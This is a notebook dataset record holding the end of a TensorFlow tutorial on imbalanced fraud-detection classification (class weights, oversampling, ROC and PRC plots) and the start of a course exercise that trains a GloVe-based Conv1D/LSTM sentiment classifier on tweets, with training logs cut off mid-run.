"The above figure makes it clear: In terms of validation loss, on this problem, this careful initialization gives a clear advantage. ",
"_____no_output_____"
],
[
"### Train the model",
"_____no_output_____"
]
],
[
[
"model = make_model()\nmodel.load_weights(initial_weights)\nbaseline_history = model.fit(\n train_features,\n train_labels,\n batch_size=BATCH_SIZE,\n epochs=EPOCHS,\n callbacks=[early_stopping],\n validation_data=(val_features, val_labels))",
"_____no_output_____"
]
],
[
[
"### Check training history\n\nIn this section, you will produce plots of your model's accuracy and loss on the training and validation set. These are useful to check for overfitting, which you can learn more about in the [Overfit and underfit](https://www.tensorflow.org/tutorials/keras/overfit_and_underfit) tutorial.\n\nAdditionally, you can produce these plots for any of the metrics you created above. False negatives are included as an example.",
"_____no_output_____"
]
],
[
[
"def plot_metrics(history):\n metrics = ['loss', 'prc', 'precision', 'recall']\n for n, metric in enumerate(metrics):\n name = metric.replace(\"_\",\" \").capitalize()\n plt.subplot(2,2,n+1)\n plt.plot(history.epoch, history.history[metric], color=colors[0], label='Train')\n plt.plot(history.epoch, history.history['val_'+metric],\n color=colors[0], linestyle=\"--\", label='Val')\n plt.xlabel('Epoch')\n plt.ylabel(name)\n if metric == 'loss':\n plt.ylim([0, plt.ylim()[1]])\n elif metric == 'auc':\n plt.ylim([0.8,1])\n else:\n plt.ylim([0,1])\n\n plt.legend()",
"_____no_output_____"
],
[
"plot_metrics(baseline_history)",
"_____no_output_____"
]
],
[
[
"Note: That the validation curve generally performs better than the training curve. This is mainly caused by the fact that the dropout layer is not active when evaluating the model.",
"_____no_output_____"
],
[
"### Evaluate metrics\n\nYou can use a [confusion matrix](https://developers.google.com/machine-learning/glossary/#confusion_matrix) to summarize the actual vs. predicted labels, where the X axis is the predicted label and the Y axis is the actual label:",
"_____no_output_____"
]
],
[
[
"train_predictions_baseline = model.predict(train_features, batch_size=BATCH_SIZE)\ntest_predictions_baseline = model.predict(test_features, batch_size=BATCH_SIZE)",
"_____no_output_____"
],
[
"def plot_cm(labels, predictions, p=0.5):\n cm = confusion_matrix(labels, predictions > p)\n plt.figure(figsize=(5,5))\n sns.heatmap(cm, annot=True, fmt=\"d\")\n plt.title('Confusion matrix @{:.2f}'.format(p))\n plt.ylabel('Actual label')\n plt.xlabel('Predicted label')\n\n print('Legitimate Transactions Detected (True Negatives): ', cm[0][0])\n print('Legitimate Transactions Incorrectly Detected (False Positives): ', cm[0][1])\n print('Fraudulent Transactions Missed (False Negatives): ', cm[1][0])\n print('Fraudulent Transactions Detected (True Positives): ', cm[1][1])\n print('Total Fraudulent Transactions: ', np.sum(cm[1]))",
"_____no_output_____"
]
],
[
[
"Evaluate your model on the test dataset and display the results for the metrics you created above:",
"_____no_output_____"
]
],
[
[
"baseline_results = model.evaluate(test_features, test_labels,\n batch_size=BATCH_SIZE, verbose=0)\nfor name, value in zip(model.metrics_names, baseline_results):\n print(name, ': ', value)\nprint()\n\nplot_cm(test_labels, test_predictions_baseline)",
"_____no_output_____"
]
],
[
[
"If the model had predicted everything perfectly, this would be a [diagonal matrix](https://en.wikipedia.org/wiki/Diagonal_matrix) where values off the main diagonal, indicating incorrect predictions, would be zero. In this case the matrix shows that you have relatively few false positives, meaning that there were relatively few legitimate transactions that were incorrectly flagged. However, you would likely want to have even fewer false negatives despite the cost of increasing the number of false positives. This trade off may be preferable because false negatives would allow fraudulent transactions to go through, whereas false positives may cause an email to be sent to a customer to ask them to verify their card activity.",
"_____no_output_____"
],
[
"### Plot the ROC\n\nNow plot the [ROC](https://developers.google.com/machine-learning/glossary#ROC). This plot is useful because it shows, at a glance, the range of performance the model can reach just by tuning the output threshold.",
"_____no_output_____"
]
],
[
[
"def plot_roc(name, labels, predictions, **kwargs):\n fp, tp, _ = sklearn.metrics.roc_curve(labels, predictions)\n\n plt.plot(100*fp, 100*tp, label=name, linewidth=2, **kwargs)\n plt.xlabel('False positives [%]')\n plt.ylabel('True positives [%]')\n plt.xlim([-0.5,20])\n plt.ylim([80,100.5])\n plt.grid(True)\n ax = plt.gca()\n ax.set_aspect('equal')",
"_____no_output_____"
],
[
"plot_roc(\"Train Baseline\", train_labels, train_predictions_baseline, color=colors[0])\nplot_roc(\"Test Baseline\", test_labels, test_predictions_baseline, color=colors[0], linestyle='--')\nplt.legend(loc='lower right')",
"_____no_output_____"
]
],
[
[
"### Plot the AUPRC\r\n\nNow plot the [AUPRC](https://developers.google.com/machine-learning/glossary?hl=en#PR_AUC). Area under the interpolated precision-recall curve, obtained by plotting (recall, precision) points for different values of the classification threshold. Depending on how it's calculated, PR AUC may be equivalent to the average precision of the model.\r\n",
"_____no_output_____"
]
],
[
[
"def plot_prc(name, labels, predictions, **kwargs):\r\n precision, recall, _ = sklearn.metrics.precision_recall_curve(labels, predictions)\r\n\r\n plt.plot(precision, recall, label=name, linewidth=2, **kwargs)\r\n plt.xlabel('Recall')\r\n plt.ylabel('Precision')\r\n plt.grid(True)\r\n ax = plt.gca()\r\n ax.set_aspect('equal')",
"_____no_output_____"
],
[
"plot_prc(\"Train Baseline\", train_labels, train_predictions_baseline, color=colors[0])\r\nplot_prc(\"Test Baseline\", test_labels, test_predictions_baseline, color=colors[0], linestyle='--')\r\nplt.legend(loc='lower right')",
"_____no_output_____"
]
],
[
[
"It looks like the precision is relatively high, but the recall and the area under the ROC curve (AUC) aren't as high as you might like. Classifiers often face challenges when trying to maximize both precision and recall, which is especially true when working with imbalanced datasets. It is important to consider the costs of different types of errors in the context of the problem you care about. In this example, a false negative (a fraudulent transaction is missed) may have a financial cost, while a false positive (a transaction is incorrectly flagged as fraudulent) may decrease user happiness.",
"_____no_output_____"
],
[
"## Class weights",
"_____no_output_____"
],
[
"### Calculate class weights\n\nThe goal is to identify fraudulent transactions, but you don't have very many of those positive samples to work with, so you would want to have the classifier heavily weight the few examples that are available. You can do this by passing Keras weights for each class through a parameter. These will cause the model to \"pay more attention\" to examples from an under-represented class.",
"_____no_output_____"
]
],
[
[
"# Scaling by total/2 helps keep the loss to a similar magnitude.\n# The sum of the weights of all examples stays the same.\nweight_for_0 = (1 / neg) * (total / 2.0)\nweight_for_1 = (1 / pos) * (total / 2.0)\n\nclass_weight = {0: weight_for_0, 1: weight_for_1}\n\nprint('Weight for class 0: {:.2f}'.format(weight_for_0))\nprint('Weight for class 1: {:.2f}'.format(weight_for_1))",
"_____no_output_____"
]
],
[
[
"### Train a model with class weights\n\nNow try re-training and evaluating the model with class weights to see how that affects the predictions.\n\nNote: Using `class_weights` changes the range of the loss. This may affect the stability of the training depending on the optimizer. Optimizers whose step size is dependent on the magnitude of the gradient, like `tf.keras.optimizers.SGD`, may fail. The optimizer used here, `tf.keras.optimizers.Adam`, is unaffected by the scaling change. Also note that because of the weighting, the total losses are not comparable between the two models.",
"_____no_output_____"
]
],
[
[
"weighted_model = make_model()\nweighted_model.load_weights(initial_weights)\n\nweighted_history = weighted_model.fit(\n train_features,\n train_labels,\n batch_size=BATCH_SIZE,\n epochs=EPOCHS,\n callbacks=[early_stopping],\n validation_data=(val_features, val_labels),\n # The class weights go here\n class_weight=class_weight) ",
"_____no_output_____"
]
],
[
[
"### Check training history",
"_____no_output_____"
]
],
[
[
"plot_metrics(weighted_history)",
"_____no_output_____"
]
],
[
[
"### Evaluate metrics",
"_____no_output_____"
]
],
[
[
"train_predictions_weighted = weighted_model.predict(train_features, batch_size=BATCH_SIZE)\ntest_predictions_weighted = weighted_model.predict(test_features, batch_size=BATCH_SIZE)",
"_____no_output_____"
],
[
"weighted_results = weighted_model.evaluate(test_features, test_labels,\n batch_size=BATCH_SIZE, verbose=0)\nfor name, value in zip(weighted_model.metrics_names, weighted_results):\n print(name, ': ', value)\nprint()\n\nplot_cm(test_labels, test_predictions_weighted)",
"_____no_output_____"
]
],
[
[
"Here you can see that with class weights the accuracy and precision are lower because there are more false positives, but conversely the recall and AUC are higher because the model also found more true positives. Despite having lower accuracy, this model has higher recall (and identifies more fraudulent transactions). Of course, there is a cost to both types of error (you wouldn't want to bug users by flagging too many legitimate transactions as fraudulent, either). Carefully consider the trade-offs between these different types of errors for your application.",
"_____no_output_____"
],
[
"### Plot the ROC",
"_____no_output_____"
]
],
[
[
"plot_roc(\"Train Baseline\", train_labels, train_predictions_baseline, color=colors[0])\nplot_roc(\"Test Baseline\", test_labels, test_predictions_baseline, color=colors[0], linestyle='--')\n\nplot_roc(\"Train Weighted\", train_labels, train_predictions_weighted, color=colors[1])\nplot_roc(\"Test Weighted\", test_labels, test_predictions_weighted, color=colors[1], linestyle='--')\n\n\nplt.legend(loc='lower right')",
"_____no_output_____"
]
],
[
[
"### Plot the AUPRC",
"_____no_output_____"
]
],
[
[
"plot_prc(\"Train Baseline\", train_labels, train_predictions_baseline, color=colors[0])\r\nplot_prc(\"Test Baseline\", test_labels, test_predictions_baseline, color=colors[0], linestyle='--')\r\n\r\nplot_prc(\"Train Weighted\", train_labels, train_predictions_weighted, color=colors[1])\r\nplot_prc(\"Test Weighted\", test_labels, test_predictions_weighted, color=colors[1], linestyle='--')\r\n\r\n\r\nplt.legend(loc='lower right')",
"_____no_output_____"
]
],
[
[
"## Oversampling",
"_____no_output_____"
],
[
"### Oversample the minority class\n\nA related approach would be to resample the dataset by oversampling the minority class.",
"_____no_output_____"
]
],
[
[
"pos_features = train_features[bool_train_labels]\nneg_features = train_features[~bool_train_labels]\n\npos_labels = train_labels[bool_train_labels]\nneg_labels = train_labels[~bool_train_labels]",
"_____no_output_____"
]
],
[
[
"#### Using NumPy\n\nYou can balance the dataset manually by choosing the right number of random \nindices from the positive examples:",
"_____no_output_____"
]
],
[
[
"ids = np.arange(len(pos_features))\nchoices = np.random.choice(ids, len(neg_features))\n\nres_pos_features = pos_features[choices]\nres_pos_labels = pos_labels[choices]\n\nres_pos_features.shape",
"_____no_output_____"
],
[
"resampled_features = np.concatenate([res_pos_features, neg_features], axis=0)\nresampled_labels = np.concatenate([res_pos_labels, neg_labels], axis=0)\n\norder = np.arange(len(resampled_labels))\nnp.random.shuffle(order)\nresampled_features = resampled_features[order]\nresampled_labels = resampled_labels[order]\n\nresampled_features.shape",
"_____no_output_____"
]
],
[
[
"#### Using `tf.data`",
"_____no_output_____"
],
[
"If you're using `tf.data` the easiest way to produce balanced examples is to start with a `positive` and a `negative` dataset, and merge them. See [the tf.data guide](../../guide/data.ipynb) for more examples.",
"_____no_output_____"
]
],
[
[
"BUFFER_SIZE = 100000\n\ndef make_ds(features, labels):\n ds = tf.data.Dataset.from_tensor_slices((features, labels))#.cache()\n ds = ds.shuffle(BUFFER_SIZE).repeat()\n return ds\n\npos_ds = make_ds(pos_features, pos_labels)\nneg_ds = make_ds(neg_features, neg_labels)",
"_____no_output_____"
]
],
[
[
"Each dataset provides `(feature, label)` pairs:",
"_____no_output_____"
]
],
[
[
"for features, label in pos_ds.take(1):\n print(\"Features:\\n\", features.numpy())\n print()\n print(\"Label: \", label.numpy())",
"_____no_output_____"
]
],
[
[
"Merge the two together using `experimental.sample_from_datasets`:",
"_____no_output_____"
]
],
[
[
"resampled_ds = tf.data.experimental.sample_from_datasets([pos_ds, neg_ds], weights=[0.5, 0.5])\nresampled_ds = resampled_ds.batch(BATCH_SIZE).prefetch(2)",
"_____no_output_____"
],
[
"for features, label in resampled_ds.take(1):\n print(label.numpy().mean())",
"_____no_output_____"
]
],
[
[
"To use this dataset, you'll need the number of steps per epoch.\n\nThe definition of \"epoch\" in this case is less clear. Say it's the number of batches required to see each negative example once:",
"_____no_output_____"
]
],
[
[
"resampled_steps_per_epoch = np.ceil(2.0*neg/BATCH_SIZE)\nresampled_steps_per_epoch",
"_____no_output_____"
]
],
[
[
"### Train on the oversampled data\n\nNow try training the model with the resampled data set instead of using class weights to see how these methods compare.\n\nNote: Because the data was balanced by replicating the positive examples, the total dataset size is larger, and each epoch runs for more training steps. ",
"_____no_output_____"
]
],
[
[
"resampled_model = make_model()\nresampled_model.load_weights(initial_weights)\n\n# Reset the bias to zero, since this dataset is balanced.\noutput_layer = resampled_model.layers[-1] \noutput_layer.bias.assign([0])\n\nval_ds = tf.data.Dataset.from_tensor_slices((val_features, val_labels)).cache()\nval_ds = val_ds.batch(BATCH_SIZE).prefetch(2) \n\nresampled_history = resampled_model.fit(\n resampled_ds,\n epochs=EPOCHS,\n steps_per_epoch=resampled_steps_per_epoch,\n callbacks=[early_stopping],\n validation_data=val_ds)",
"_____no_output_____"
]
],
[
[
"If the training process were considering the whole dataset on each gradient update, this oversampling would be basically identical to the class weighting.\n\nBut when training the model batch-wise, as you did here, the oversampled data provides a smoother gradient signal: Instead of each positive example being shown in one batch with a large weight, they're shown in many different batches each time with a small weight. \n\nThis smoother gradient signal makes it easier to train the model.",
"_____no_output_____"
],
[
"### Check training history\n\nNote that the distributions of metrics will be different here, because the training data has a totally different distribution from the validation and test data. ",
"_____no_output_____"
]
],
[
[
"plot_metrics(resampled_history)",
"_____no_output_____"
]
],
[
[
"### Re-train\n",
"_____no_output_____"
],
[
"Because training is easier on the balanced data, the above training procedure may overfit quickly. \n\nSo break up the epochs to give the `tf.keras.callbacks.EarlyStopping` finer control over when to stop training.",
"_____no_output_____"
]
],
[
[
"resampled_model = make_model()\nresampled_model.load_weights(initial_weights)\n\n# Reset the bias to zero, since this dataset is balanced.\noutput_layer = resampled_model.layers[-1] \noutput_layer.bias.assign([0])\n\nresampled_history = resampled_model.fit(\n resampled_ds,\n # These are not real epochs\n steps_per_epoch=20,\n epochs=10*EPOCHS,\n callbacks=[early_stopping],\n validation_data=(val_ds))",
"_____no_output_____"
]
],
[
[
"### Re-check training history",
"_____no_output_____"
]
],
[
[
"plot_metrics(resampled_history)",
"_____no_output_____"
]
],
[
[
"### Evaluate metrics",
"_____no_output_____"
]
],
[
[
"train_predictions_resampled = resampled_model.predict(train_features, batch_size=BATCH_SIZE)\ntest_predictions_resampled = resampled_model.predict(test_features, batch_size=BATCH_SIZE)",
"_____no_output_____"
],
[
"resampled_results = resampled_model.evaluate(test_features, test_labels,\n batch_size=BATCH_SIZE, verbose=0)\nfor name, value in zip(resampled_model.metrics_names, resampled_results):\n print(name, ': ', value)\nprint()\n\nplot_cm(test_labels, test_predictions_resampled)",
"_____no_output_____"
]
],
[
[
"### Plot the ROC",
"_____no_output_____"
]
],
[
[
"plot_roc(\"Train Baseline\", train_labels, train_predictions_baseline, color=colors[0])\nplot_roc(\"Test Baseline\", test_labels, test_predictions_baseline, color=colors[0], linestyle='--')\n\nplot_roc(\"Train Weighted\", train_labels, train_predictions_weighted, color=colors[1])\nplot_roc(\"Test Weighted\", test_labels, test_predictions_weighted, color=colors[1], linestyle='--')\n\nplot_roc(\"Train Resampled\", train_labels, train_predictions_resampled, color=colors[2])\nplot_roc(\"Test Resampled\", test_labels, test_predictions_resampled, color=colors[2], linestyle='--')\nplt.legend(loc='lower right')",
"_____no_output_____"
]
],
[
[
"### Plot the AUPRC\r\n",
"_____no_output_____"
]
],
[
[
"plot_prc(\"Train Baseline\", train_labels, train_predictions_baseline, color=colors[0])\r\nplot_prc(\"Test Baseline\", test_labels, test_predictions_baseline, color=colors[0], linestyle='--')\r\n\r\nplot_prc(\"Train Weighted\", train_labels, train_predictions_weighted, color=colors[1])\r\nplot_prc(\"Test Weighted\", test_labels, test_predictions_weighted, color=colors[1], linestyle='--')\r\n\r\nplot_prc(\"Train Resampled\", train_labels, train_predictions_resampled, color=colors[2])\r\nplot_prc(\"Test Resampled\", test_labels, test_predictions_resampled, color=colors[2], linestyle='--')\r\nplt.legend(loc='lower right')",
"_____no_output_____"
]
],
[
[
"## Applying this tutorial to your problem\n\nImbalanced data classification is an inherently difficult task since there are so few samples to learn from. You should always start with the data first and do your best to collect as many samples as possible and give substantial thought to what features may be relevant so the model can get the most out of your minority class. At some point your model may struggle to improve and yield the results you want, so it is important to keep in mind the context of your problem and the trade offs between different types of errors.",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
]
] |
cb02278c5f3bb8ac3d1c92589b5b43565a7d5442 | 66,755 | ipynb | Jupyter Notebook | TF-in-practice-Coursera/3-NLP/NLP_Course_Week_3_Exercise_Question_exploring_overfitting_in_nlp.ipynb | yuynwa/Coursera | e7e44dc11575e00feaa5c4996c97156988c13f6f | [
"MIT"
] | null | null | null | TF-in-practice-Coursera/3-NLP/NLP_Course_Week_3_Exercise_Question_exploring_overfitting_in_nlp.ipynb | yuynwa/Coursera | e7e44dc11575e00feaa5c4996c97156988c13f6f | [
"MIT"
] | null | null | null | TF-in-practice-Coursera/3-NLP/NLP_Course_Week_3_Exercise_Question_exploring_overfitting_in_nlp.ipynb | yuynwa/Coursera | e7e44dc11575e00feaa5c4996c97156988c13f6f | [
"MIT"
] | null | null | null | 118.99287 | 22,440 | 0.795925 | [
[
[
"import json\nimport tensorflow as tf\nimport csv\nimport random\nimport numpy as np\n\nfrom tensorflow.keras.preprocessing.text import Tokenizer\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\nfrom tensorflow.keras.utils import to_categorical\nfrom tensorflow.keras import regularizers\n\n\nembedding_dim = 100\nmax_length = 16\ntrunc_type='post'\npadding_type='post'\noov_tok = \"<OOV>\"\ntraining_size=160000\ntest_portion=.1\n\n\n",
"_____no_output_____"
],
[
"\n# Note that I cleaned the Stanford dataset to remove LATIN1 encoding to make it easier for Python CSV reader\n# You can do that yourself with:\n# iconv -f LATIN1 -t UTF8 training.1600000.processed.noemoticon.csv -o training_cleaned.csv\n# I then hosted it on my site to make it easier to use in this notebook\n\n!wget --no-check-certificate \\\n https://storage.googleapis.com/laurencemoroney-blog.appspot.com/training_cleaned.csv \\\n -O /tmp/training_cleaned.csv\ncorpus = []\nnum_sentences = 0\n\nwith open(\"/tmp/training_cleaned.csv\") as csvfile:\n reader = csv.reader(csvfile, delimiter=',')\n for row in reader:\n # Your Code here. Create list items where the first item is the text, found in row[5], and the second is the label. Note that the label is a '0' or a '4' in the text. When it's the former, make\n # your label to be 0, otherwise 1. Keep a count of the number of sentences in num_sentences\n list_item=[]\n list_item.append(row[5])\n \n # YOUR CODE HERE\n if row[0] == '0':\n list_item.append(0)\n else:\n list_item.append(1)\n num_sentences = num_sentences + 1\n corpus.append(list_item)\n\n\n",
"--2019-09-14 05:04:09-- https://storage.googleapis.com/laurencemoroney-blog.appspot.com/training_cleaned.csv\nResolving storage.googleapis.com (storage.googleapis.com)... 108.177.97.128, 2404:6800:4008:c01::80\nConnecting to storage.googleapis.com (storage.googleapis.com)|108.177.97.128|:443... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 238942690 (228M) [application/octet-stream]\nSaving to: ‘/tmp/training_cleaned.csv’\n\n/tmp/training_clean 100%[===================>] 227.87M 112MB/s in 2.0s \n\n2019-09-14 05:04:11 (112 MB/s) - ‘/tmp/training_cleaned.csv’ saved [238942690/238942690]\n\n"
],
[
"print(num_sentences)\nprint(len(corpus))\nprint(corpus[1])\n\n# Expected Output:\n# 1600000\n# 1600000\n# [\"is upset that he can't update his Facebook by texting it... and might cry as a result School today also. Blah!\", 0]",
"1600000\n1600000\n[\"is upset that he can't update his Facebook by texting it... and might cry as a result School today also. Blah!\", 0]\n"
],
[
"sentences=[]\nlabels=[]\nrandom.shuffle(corpus)\nfor x in range(training_size):\n sentences.append(corpus[x][0])\n labels.append(corpus[x][1])\n\n\ntokenizer = Tokenizer()\ntokenizer.fit_on_texts(sentences)\n\nword_index = tokenizer.word_index\nvocab_size=len(word_index)\n\nsequences = tokenizer.texts_to_sequences(sentences)\npadded = pad_sequences(sequences, maxlen=max_length, padding=padding_type, truncating=trunc_type)\n\nsplit = int(test_portion * training_size)\n\ntest_sequences = padded[:split]\ntraining_sequences = padded[split:training_size]\ntest_labels = labels[:split]\ntraining_labels = labels[split:training_size]",
"_____no_output_____"
],
[
"print(vocab_size)\nprint(word_index['i'])\n# Expected Output\n# 138858\n# 1",
"138360\n1\n"
],
[
"# Note this is the 100 dimension version of GloVe from Stanford\n# I unzipped and hosted it on my site to make this notebook easier\n!wget --no-check-certificate \\\n https://storage.googleapis.com/laurencemoroney-blog.appspot.com/glove.6B.100d.txt \\\n -O /tmp/glove.6B.100d.txt\nembeddings_index = {};\nwith open('/tmp/glove.6B.100d.txt') as f:\n for line in f:\n values = line.split();\n word = values[0];\n coefs = np.asarray(values[1:], dtype='float32');\n embeddings_index[word] = coefs;\n\nembeddings_matrix = np.zeros((vocab_size+1, embedding_dim));\nfor word, i in word_index.items():\n embedding_vector = embeddings_index.get(word);\n if embedding_vector is not None:\n embeddings_matrix[i] = embedding_vector;",
"--2019-09-14 05:04:58-- https://storage.googleapis.com/laurencemoroney-blog.appspot.com/glove.6B.100d.txt\nResolving storage.googleapis.com (storage.googleapis.com)... 74.125.23.128, 2404:6800:4008:c01::80\nConnecting to storage.googleapis.com (storage.googleapis.com)|74.125.23.128|:443... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 347116733 (331M) [text/plain]\nSaving to: ‘/tmp/glove.6B.100d.txt’\n\n/tmp/glove.6B.100d. 100%[===================>] 331.04M 86.1MB/s in 4.1s \n\n2019-09-14 05:05:03 (81.7 MB/s) - ‘/tmp/glove.6B.100d.txt’ saved [347116733/347116733]\n\n"
],
[
"print(len(embeddings_matrix))\n# Expected Output\n# 138859",
"138361\n"
],
[
"model = tf.keras.Sequential([\n tf.keras.layers.Embedding(vocab_size+1, embedding_dim, input_length=max_length, weights=[embeddings_matrix], trainable=False),\n tf.keras.layers.Dropout(0.2),\n tf.keras.layers.Conv1D(64, 5, activation='relu'),\n tf.keras.layers.MaxPooling1D(pool_size=4),\n tf.keras.layers.LSTM(64),\n tf.keras.layers.Dense(1, activation='sigmoid')\n])\nmodel.compile(\n loss='binary_crossentropy',\n optimizer='adam',\n metrics=['accuracy'],\n)\nmodel.summary()\n\nnum_epochs = 50\nhistory = model.fit(training_sequences, training_labels, epochs=num_epochs, validation_data=(test_sequences, test_labels), verbose=2)\n\nprint(\"Training Complete\")\n",
"Model: \"sequential_5\"\n_________________________________________________________________\nLayer (type) Output Shape Param # \n=================================================================\nembedding_5 (Embedding) (None, 16, 100) 13836100 \n_________________________________________________________________\ndropout_5 (Dropout) (None, 16, 100) 0 \n_________________________________________________________________\nconv1d_5 (Conv1D) (None, 12, 64) 32064 \n_________________________________________________________________\nmax_pooling1d_5 (MaxPooling1 (None, 3, 64) 0 \n_________________________________________________________________\nlstm_5 (LSTM) (None, 64) 33024 \n_________________________________________________________________\ndense_5 (Dense) (None, 1) 65 \n=================================================================\nTotal params: 13,901,253\nTrainable params: 65,153\nNon-trainable params: 13,836,100\n_________________________________________________________________\nTrain on 144000 samples, validate on 16000 samples\nEpoch 1/50\n144000/144000 - 57s - loss: 0.5672 - acc: 0.6996 - val_loss: 0.5330 - val_acc: 0.7258\nEpoch 2/50\n144000/144000 - 56s - loss: 0.5258 - acc: 0.7327 - val_loss: 0.5091 - val_acc: 0.7468\nEpoch 3/50\n144000/144000 - 56s - loss: 0.5085 - acc: 0.7451 - val_loss: 0.5047 - val_acc: 0.7460\nEpoch 4/50\n144000/144000 - 56s - loss: 0.4972 - acc: 0.7523 - val_loss: 0.5089 - val_acc: 0.7479\nEpoch 5/50\n144000/144000 - 56s - loss: 0.4884 - acc: 0.7593 - val_loss: 0.5025 - val_acc: 0.7504\nEpoch 6/50\n144000/144000 - 56s - loss: 0.4818 - acc: 0.7621 - val_loss: 0.4985 - val_acc: 0.7534\nEpoch 7/50\n144000/144000 - 56s - loss: 0.4762 - acc: 0.7672 - val_loss: 0.5078 - val_acc: 0.7459\nEpoch 8/50\n144000/144000 - 56s - loss: 0.4708 - acc: 0.7699 - val_loss: 0.4982 - val_acc: 0.7546\nEpoch 9/50\n144000/144000 - 56s - loss: 0.4672 - acc: 0.7720 - val_loss: 0.4969 - val_acc: 0.7551\nEpoch 10/50\n144000/144000 - 56s - loss: 0.4628 - acc: 0.7748 - val_loss: 0.5002 - val_acc: 0.7543\nEpoch 11/50\n144000/144000 - 56s - loss: 0.4604 - acc: 0.7762 - val_loss: 0.5019 - val_acc: 0.7566\nEpoch 12/50\n144000/144000 - 56s - loss: 0.4575 - acc: 0.7771 - val_loss: 0.5010 - val_acc: 0.7558\nEpoch 13/50\n144000/144000 - 56s - loss: 0.4545 - acc: 0.7791 - val_loss: 0.5020 - val_acc: 0.7574\nEpoch 14/50\n144000/144000 - 56s - loss: 0.4521 - acc: 0.7814 - val_loss: 0.5023 - val_acc: 0.7542\nEpoch 15/50\n144000/144000 - 56s - loss: 0.4505 - acc: 0.7815 - val_loss: 0.5078 - val_acc: 0.7493\nEpoch 16/50\n144000/144000 - 55s - loss: 0.4493 - acc: 0.7836 - val_loss: 0.5000 - val_acc: 0.7551\nEpoch 17/50\n144000/144000 - 55s - loss: 0.4463 - acc: 0.7840 - val_loss: 0.5050 - val_acc: 0.7574\nEpoch 18/50\n144000/144000 - 56s - loss: 0.4461 - acc: 0.7835 - val_loss: 0.5071 - val_acc: 0.7549\nEpoch 19/50\n144000/144000 - 56s - loss: 0.4439 - acc: 0.7857 - val_loss: 0.5079 - val_acc: 0.7542\nEpoch 20/50\n144000/144000 - 56s - loss: 0.4419 - acc: 0.7873 - val_loss: 0.5063 - val_acc: 0.7536\nEpoch 21/50\n144000/144000 - 55s - loss: 0.4405 - acc: 0.7889 - val_loss: 0.5113 - val_acc: 0.7504\nEpoch 22/50\n144000/144000 - 55s - loss: 0.4398 - acc: 0.7894 - val_loss: 0.5113 - val_acc: 0.7545\nEpoch 23/50\n144000/144000 - 56s - loss: 0.4392 - acc: 0.7900 - val_loss: 0.5085 - val_acc: 0.7514\nEpoch 24/50\n144000/144000 - 55s - loss: 0.4371 - acc: 0.7918 - val_loss: 0.5083 - val_acc: 0.7513\nEpoch 25/50\n144000/144000 - 55s - loss: 0.4365 - acc: 0.7910 - val_loss: 0.5084 - val_acc: 0.7504\nEpoch 26/50\n144000/144000 - 55s - loss: 0.4360 - acc: 0.7919 - val_loss: 0.5101 - val_acc: 0.7524\nEpoch 27/50\n144000/144000 - 55s - loss: 0.4358 - acc: 0.7916 - val_loss: 0.5094 - val_acc: 0.7570\nEpoch 28/50\n144000/144000 - 55s - loss: 0.4342 - acc: 0.7920 - val_loss: 0.5135 - val_acc: 0.7533\nEpoch 29/50\n144000/144000 - 56s - loss: 0.4350 - acc: 0.7916 - val_loss: 0.5116 - val_acc: 0.7515\nEpoch 30/50\n144000/144000 - 55s - loss: 0.4335 - acc: 0.7930 - val_loss: 0.5102 - val_acc: 0.7553\nEpoch 31/50\n144000/144000 - 56s - loss: 0.4334 - acc: 0.7940 - val_loss: 0.5124 - val_acc: 0.7546\nEpoch 32/50\n144000/144000 - 55s - loss: 0.4324 - acc: 0.7944 - val_loss: 0.5144 - val_acc: 0.7539\nEpoch 33/50\n144000/144000 - 55s - loss: 0.4311 - acc: 0.7952 - val_loss: 0.5218 - val_acc: 0.7536\nEpoch 34/50\n144000/144000 - 56s - loss: 0.4312 - acc: 0.7941 - val_loss: 0.5156 - val_acc: 0.7541\nEpoch 35/50\n144000/144000 - 55s - loss: 